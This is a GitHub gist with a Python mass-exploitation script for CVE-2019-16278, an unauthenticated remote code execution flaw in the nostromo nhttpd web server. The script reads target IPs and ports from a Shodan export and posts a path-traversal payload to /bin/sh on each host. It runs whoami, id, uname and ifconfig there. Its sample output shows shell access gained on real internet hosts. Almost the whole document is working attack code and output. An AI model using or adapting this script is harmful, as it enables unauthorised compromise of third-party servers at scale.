Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2019-16278 nhttpd (nostromo) < 1.9.7 pre-auth RCE
# CVE-2019-16278 nhttpd (nostromo) < 1.9.7 pre-auth RCE
# Based on https://git.sp0re.sh/sp0re/Nhttpd-exploits
# Write-up : https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html
# Copyright (C) 2020 0xsha.io <me@0xsha.io>
"""
python3 cve_2019_16278.py
[~] Trying ... 62.138.23.XXX 53
[~] Trying ... 193.200.72.XXX 21
[~] Trying ... 137.119.19.XXX 8080
[~] Trying ... 202.134.205.XXX 80
[~] Trying ... 206.246.5.XXX 8080
[~] Trying ... 206.246.6.XXX 8080
#################### Vulnerable #######################
uid=2(daemon) gid=2(bin) groups=0(root)
Linux (none) 2.6.28.10-arm1HNSSahara #4 PREEMPT Fri Aug 28 11:09:54 EDT 2015 armv6l unknown
#################### End #######################
"""
"""
@author: 0xSha
@contact: me@0xsha.io
@organization: www.0xsha.io
"""
import csv
import requests
# in case of debugging and hosting detection
# import json
# import time
def read_hosts_from_csv():
"""
reads the shodan cvs dump and extract host and ports
@:parameter none
:return: host lists
"""
path = '/shodan-export.csv'
host_lists = []
with open(path, newline='') as csvfile:
records = csv.reader(csvfile)
for record in records:
host_lists.append(record[0] + ":" + record[1])
return host_lists
if __name__ == '__main__':
# proxy = {"http": "http://127.0.0.1:8080"}
exp = "/.%0d./.%0d./.%0d./.%0d./bin/sh"
for host in read_hosts_from_csv():
host, port = host.split(':')
# Lazy Me
if "IP" not in host:
# Debugging request
# req = requests.post('http://' + host + ":" + port+exp,
# data='ifconfig 2>&1; echo "~~~~~~~~~"; id; echo "##########";', timeout=3,
# proxies=proxy)
try:
cmd = "whoami;id;uname -a"
print("[~] Trying ... " + host, port)
req2 = requests.post('http://' + host + ":" + port + exp,
data='ifconfig 2>&1; echo "~~~~~~~~~~"; ' + cmd + ' ; echo "##########";',
timeout=10) # change the timeout if needed
# print (req2.status_code)
# print (req2.text)
firstIndex = str(req2.text).find('~~~~~~~~~~')
secondIndex = str(req2.text).find('##########')
if firstIndex:
print("#################### Vulnerable #######################")
print("[+] Now exploiting "+host)
print(str(req2.text)[firstIndex + 10:secondIndex])
# Host Detection
# time.sleep(10)
# req3 = requests.get(
# 'https://www.who-hosts-this.com/APIEndpoint/Detect?key'
# '=YOUR_API_KEY&url=' + host)
# isp = json.loads(req3.text)
# print("Hosted by:" + isp['results'][0]['isp_name'])
print("#################### End #######################")
except:
# print('Err' + host)
pass
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.